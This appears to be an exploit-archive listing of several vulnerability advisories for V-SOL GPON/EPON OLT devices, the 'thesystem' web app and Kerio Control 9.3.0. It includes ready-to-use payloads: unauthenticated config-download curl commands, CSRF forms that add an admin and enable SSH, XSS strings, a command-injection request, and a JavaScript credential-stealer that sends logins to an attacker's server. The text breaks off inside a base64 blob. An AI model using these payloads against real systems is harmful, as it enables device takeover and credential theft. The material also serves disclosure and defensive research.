Vendor: Guangzhou V-SOLUTION Electronic Technology Co., Ltd.
Product web page: https://www.vsolcn.com
Affected version: V2.03.62R_IPv6
V2.03.54R
V2.03.52R
V2.03.49
V2.03.47
V2.03.40
V2.03.26
V2.03.24
V1.8.6
V1.4
Summary: GPON is currently the leading FTTH standard in broadband access
technology being widely deployed by service providers around the world.
GPON/EPON OLT products are 1U height 19 inch rack mount products. The
features of the OLT are small, convenient, flexible, easy to deploy, high
performance. It is appropriate to be deployed in compact room environment.
The OLTs can be used for 'Triple-Play', VPN, IP Camera, Enterprise LAN and
ICT applications.
Desc: The device OLT Web Management Interface is vulnerable to unauthenticated
configuration download and information disclosure vulnerability when direct
object reference is made to the usrcfg.conf file using an HTTP GET method. This
will enable the attacker to disclose sensitive information and help her in
authentication bypass, privilege escalation and/or full system access.
Tested on: GoAhead-Webs
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2019-5534
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5534.php
25.09.2019
--
1# curl http://192.168.8.200/device/usrcfg.conf
2# curl http://192.168.8.201/action/usrcfg.conf
↧
↧
V-SOL GPON/EPON OLT Platform 2.03 Link Manipulation
V-SOL GPON/EPON OLT Platform version 2.03 suffers from a link manipulation vulnerability.
5cea90218187ba10520f17a600a8536f
V-SOL GPON/EPON OLT Platform v2.03 Link Manipulation Vulnerability
Vendor: Guangzhou V-SOLUTION Electronic Technology Co., Ltd.
Product web page: https://www.vsolcn.com
Affected version: V2.03.62R_IPv6
V2.03.54R
V2.03.52R
V2.03.49
V2.03.47
V2.03.40
V2.03.26
V2.03.24
V1.8.6
V1.4
Summary: GPON is currently the leading FTTH standard in broadband access
technology being widely deployed by service providers around the world.
GPON/EPON OLT products are 1U height 19 inch rack mount products. The
features of the OLT are small, convenient, flexible, easy to deploy, high
performance. It is appropriate to be deployed in compact room environment.
The OLTs can be used for 'Triple-Play', VPN, IP Camera, Enterprise LAN and
ICT applications.
Desc: Input passed via the 'parent' GET parameter in 'bindProfile.html' script
is not properly verified before being used to redirect users. This can be
exploited to redirect a logged-in user to an arbitrary website e.g. when a
user clicks a specially crafted link to the affected script hosted on a trusted
domain.
Tested on: GoAhead-Webs
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2019-5535
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5535.php
25.09.2019
--
CSRF URL Redirect request:
GET /action/bindProfile.html?parent=https://zeroscience.mk/index
Host: 192.168.8.200
Response:
HTTP/1.1 200 OK
Location: https://zeroscience.mk/index.html?select=0
↧
V-SOL GPON/EPON OLT Platform 2.03 Cross Site Request Forgery
V-SOL GPON/EPON OLT Platform version 2.03 suffers from a cross site request forgery vulnerability.
3984bdb37b70ac28c71fd67b0602e997
V-SOL GPON/EPON OLT Platform v2.03 Cross-Site Request Forgery
Vendor: Guangzhou V-SOLUTION Electronic Technology Co., Ltd.
Product web page: https://www.vsolcn.com
Affected version: V2.03.62R_IPv6
V2.03.54R
V2.03.52R
V2.03.49
V2.03.47
V2.03.40
V2.03.26
V2.03.24
V1.8.6
V1.4
Summary: GPON is currently the leading FTTH standard in broadband access
technology being widely deployed by service providers around the world.
GPON/EPON OLT products are 1U height 19 inch rack mount products. The
features of the OLT are small, convenient, flexible, easy to deploy, high
performance. It is appropriate to be deployed in compact room environment.
The OLTs can be used for 'Triple-Play', VPN, IP Camera, Enterprise LAN and
ICT applications.
Desc: The application interface allows users to perform certain actions via
HTTP requests without performing any validity checks to verify the requests.
This can be exploited to perform certain actions with administrative privileges
if a logged-in user visits a malicious web site.
Tested on: GoAhead-Webs
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2019-5536
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5536.php
25.09.2019
--
CSRF add admin:
---------------
<html>
<body>
<form action="http://192.168.8.200/action/user.html" method="POST">
<input type="hidden" name="user_name_add" value="Spy" />
<input type="hidden" name="user_password_add" value="pass123" />
<input type="hidden" name="password_confirm_add" value="pass123" />
<input type="hidden" name="user_role" value="1" />
<input type="hidden" name="user_name_mod" value="" />
<input type="hidden" name="user_password_mod" value="" />
<input type="hidden" name="password_confirm_mod" value="" />
<input type="hidden" name="user_role_mod" value="0" />
<input type="hidden" name="option_um" value="100/" />
<input type="hidden" name="who" value="0" />
<input type="submit" value="Init" />
</form>
</body>
</html>
CSRF enable SSH:
----------------
<html>
<body>
<form action="https://192.168.8.200/action/sshglobal.html" method="POST">
<input type="hidden" name="ssh_enable" value="1" />
<input type="hidden" name="ssh_version" value="2" />
<input type="hidden" name="auth_retries" value="6" />
<input type="hidden" name="ssh_timeout" value="120" />
<input type="hidden" name="ssh_modulus" value="2048" />
<input type="hidden" name="who" value="0" />
<input type="submit" value="Init" />
</form>
</body>
</html>
↧
V-SOL GPON/EPON OLT Platform 2.03 Cross Site Scripting
V-SOL GPON/EPON OLT Platform version 2.03 suffers from multiple cross site scripting vulnerabilities.
161ad7796bb183c01e640765c590c2f4
V-SOL GPON/EPON OLT Platform v2.03 Reflected XSS Vulnerability
Vendor: Guangzhou V-SOLUTION Electronic Technology Co., Ltd.
Product web page: https://www.vsolcn.com
Affected version: V2.03.62R_IPv6
V2.03.54R
V2.03.52R
V2.03.49
V2.03.47
V2.03.40
V2.03.26
V2.03.24
V1.8.6
V1.4
Summary: GPON is currently the leading FTTH standard in broadband access
technology being widely deployed by service providers around the world.
GPON/EPON OLT products are 1U height 19 inch rack mount products. The
features of the OLT are small, convenient, flexible, easy to deploy, high
performance. It is appropriate to be deployed in compact room environment.
The OLTs can be used for 'Triple-Play', VPN, IP Camera, Enterprise LAN and
ICT applications.
Desc: The application is prone to multiple reflected cross-site scripting
vulnerabilities due to a failure to properly sanitize user-supplied input
to several parameters that are handled by various scripts. Attackers can
exploit this issue to execute arbitrary HTML and script code in a user's
browser session.
Tested on: GoAhead-Webs
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2019-5537
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5537.php
25.09.2019
--
GET /action/bindProfile.html?parent="><script>confirm(251)</script>&gponid=2&gonuid=7
GET /action/ntp.html?sntp_en=1&time_zone=05%3A30&sntp_server="><script>confirm(251)</script>&who=0
↧
V-SOL GPON/EPON OLT Platform 2.03 Remote Privilege Escalation
V-SOL GPON/EPON OLT Platform version 2.03 suffers from a remote privilege escalation vulnerability.
9ffbb8b361484f30a575b6f38d2ef37a
V-SOL GPON/EPON OLT Platform v2.03 Remote Privilege Escalation
Vendor: Guangzhou V-SOLUTION Electronic Technology Co., Ltd.
Product web page: https://www.vsolcn.com
Affected version: V2.03.62R_IPv6
V2.03.54R
V2.03.52R
V2.03.49
V2.03.47
V2.03.40
V2.03.26
V2.03.24
V1.8.6
V1.4
Summary: GPON is currently the leading FTTH standard in broadband access
technology being widely deployed by service providers around the world.
GPON/EPON OLT products are 1U height 19 inch rack mount products. The
features of the OLT are small, convenient, flexible, easy to deploy, high
performance. It is appropriate to be deployed in compact room environment.
The OLTs can be used for 'Triple-Play', VPN, IP Camera, Enterprise LAN and
ICT applications.
Desc: The application suffers from a privilege escalation vulnerability.
Normal user can elevate his/her privileges by sending a HTTP POST request
setting the parameter 'user_role_mod' to integer value '1' gaining admin
rights.
Tested on: GoAhead-Webs
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2019-5538
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5538.php
25.09.2019
--
<html>
<body>
<form action="http://192.168.8.200/action/user.html" method="POST">
<input type="hidden" name="user_name_add" value="" />
<input type="hidden" name="user_password_add" value="" />
<input type="hidden" name="password_confirm_add" value="" />
<input type="hidden" name="user_role" value="0" />
<input type="hidden" name="user_password_mod" value="test" />
<input type="hidden" name="password_confirm_mod" value="test" />
<input type="hidden" name="user_role_mod" value="1" />
<input type="hidden" name="option_um" value="17" />
<input type="hidden" name="who" value="1" />
<input type="submit" value="Escalate" />
</form>
</body>
</html>
↧
↧
thesystem 1.0 Command Injection
thesystem version 1.0 suffers from a command injection vulnerability.
ae570470c14e8e29e496f8d9f1f29369# Exploit Title: thesystem Command Injection
# Author: Sadik Cetin
# Discovery Date: 2019-09-28
# Vendor Homepage: [ https://github.com/kostasmitroglou/thesystem | https://github.com/kostasmitroglou/thesystem ]
# Software Link: [ https://github.com/kostasmitroglou/thesystem | https://github.com/kostasmitroglou/thesystem ]
# Tested Version: 1.0
# Tested on OS: Windows 10
# CVE: N/A
# Type: Webapps
# Description:
# Simple Command injection after login bypass(login_required didn't used)
POST /run_command/ HTTP/1.1
Host: 127.0.0.1:8000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------168279961491
Content-Length: 325
Connection: close
Referer: [ http://127.0.0.1:8000/run_command/ | http://127.0.0.1:8000/run_command/ ]
Cookie: csrftoken=Mss47G2ILybbQoFYXpVPlWNaUzGQ5yKoXGRPucrKIG4gz5X9TVEPQJtItbqN9SM6; _ga=GA1.1.567905900.1569231977; _gid=GA1.1.882048829.1569577719
Upgrade-Insecure-Requests: 1
-----------------------------168279961491
Content-Disposition: form-data; name="csrfmiddlewaretoken"
7rigJnIFAByKlmo6NBD7R8Ua66daVjdfiFH16T7HxJrP43GhJ7m7mVAIFIX7ZDfX
-----------------------------168279961491
Content-Disposition: form-data; name="command"
ping 127.0.0.1
-----------------------------168279961491--
HTTP/1.1 200 OK
Date: Sat, 28 Sep 2019 09:42:26 GMT
Server: WSGIServer/0.2 CPython/3.5.3
Content-Length: 429
Content-Type: text/html; charset=utf-8
X-Frame-Options: SAMEORIGIN
Pinging 127.0.0.1 with 32 bytes of data:
Reply from 127.0.0.1: bytes=32 time<1ms TTL=128
Reply from 127.0.0.1: bytes=32 time<1ms TTL=128
Reply from 127.0.0.1: bytes=32 time<1ms TTL=128
Reply from 127.0.0.1: bytes=32 time<1ms TTL=128
Ping statistics for 127.0.0.1:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms
When I try to run following command, all commands run:
dir
whoami
↧
GFI Kerio Control 9.3.0 Cross Site Scripting
GFI Kerio Control firewall version 9.3.0 suffers from a cross site scripting vulnerability.
8549de7909e0e05df7576a5c6847a0f4/*
- DOM based XSS in Kerio Control Firewalls v9.3.0
- CVE-2019-16414
- Finder: Michael Eissele
- Description: character encoding (i.e. quote, \x22) allows to bypass input filter, opening up for DOM based XSS.
- PoC Link to include exploit:
https://<--IP/domain of affected device-->/login/?NTLM=0\x22\x3e\x3c/script\x3e\x3cscript\x20src=\x22//<--URL to exploit.js -->/this.js\x22\x3e\x3c/script\x3e
- Exploit: PoC for stealing credentials in cleartext. Script manipulates Login page to capture credentials in cleartext and sending them to the attacker.
Victim gets displayed regular errormessage for invalid login.
- Make this file a .js and host it on a random server of your choice
- Do "tail -fn 0 /var/log/apache2/access_www.your-server.com | grep "kerio_exploit" on YOUR machine (you will receive get request containing credentials there)
- only for educational purposes ;)
*/
// CHANGE THIS:
var pingbackURL='<-- attackers ip/domain for receiving credentials pingback -->'; // example: https://attackers-server.com or https://192.158.0.123
// ... exploit code starting here:
var x=document.getElementsByTagName('html')[0];x.appendChild(document.createElement('body'));var q=document.getElementsByTagName('body')[0];y=document.createElement('div');y.id='ximporter';y.style='position:absolute;top:0px;left:0px;width:100%;height:100%;z-index:99999999999;float:left;background-image:url(" data:image/png;base64,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